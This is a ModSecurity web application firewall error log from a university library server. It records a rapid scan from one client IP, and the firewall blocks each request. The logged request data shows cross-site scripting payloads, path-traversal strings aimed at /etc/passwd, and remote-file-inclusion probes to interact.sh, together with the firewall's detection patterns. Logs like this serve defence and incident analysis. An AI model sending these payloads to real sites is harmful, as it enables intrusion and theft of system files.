[Tue Aug 29 11:52:26.642103 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAnn2DIAAAAe"]
[Tue Aug 29 11:52:27.744480 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAn401MAAAAW"]
[Tue Aug 29 11:52:27.810536 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAnjjOoAAAAX"]
[Tue Aug 29 11:52:28.108978 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAmNp7MAAAAQ"]
[Tue Aug 29 11:52:28.721653 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAnjjO4AAAAX"]
[Tue Aug 29 11:52:29.682922 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAfWOOIAAAAL"]
[Tue Aug 29 11:52:30.567497 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAoLfF4AAAAG"]
[Tue Aug 29 11:52:32.619201 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kMCo-f0AAAnTlQsAAAAA"]
[Tue Aug 29 11:52:33.573225 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAnHQjwAAAAT"]
[Tue Aug 29 11:52:33.641758 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAlUls4AAAA0"]
[Tue Aug 29 11:52:34.635749 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAnjjQQAAAAX"]
[Tue Aug 29 11:52:34.679536 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAoQ3JUAAAAN"]
[Tue Aug 29 11:52:36.791907 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lMCo-f0AAAoLfHgAAAAG"]
[Tue Aug 29 11:52:37.537551 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAlUltoAAAA0"]
[Tue Aug 29 11:52:37.644780 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAoUJawAAAAB"]
[Tue Aug 29 11:52:40.053326 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAnHQmQAAAAT"]
[Tue Aug 29 11:52:40.638901 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAfWOQYAAAAL"]
[Tue Aug 29 11:52:41.789132 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAoQ3LYAAAAN"]
[Tue Aug 29 11:52:42.529485 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAnd3KQAAAAI"]
[Tue Aug 29 11:52:42.545541 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAnTlTYAAAAA"]
[Tue Aug 29 11:52:45.143439 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15ncCo-f0AAAoT7PYAAAAD"]
[Tue Aug 29 11:52:45.598809 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAnd3LsAAAAI"]
[Tue Aug 29 11:52:46.566872 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAoPuYkAAAAM"]
[Tue Aug 29 11:52:46.877680 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAoVqowAAAAH"]
[Tue Aug 29 11:52:47.616665 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAmQ-3AAAAAb"]
[Tue Aug 29 11:52:47.698523 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15n8Co-f0AAAoLfK0AAAAG"]
[Tue Aug 29 11:52:48.743459 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAnjjVQAAAAX"]
[Tue Aug 29 11:52:49.570720 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAoT7Q0AAAAD"]
[Tue Aug 29 11:52:49.611015 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAlUlxQAAAA0"]
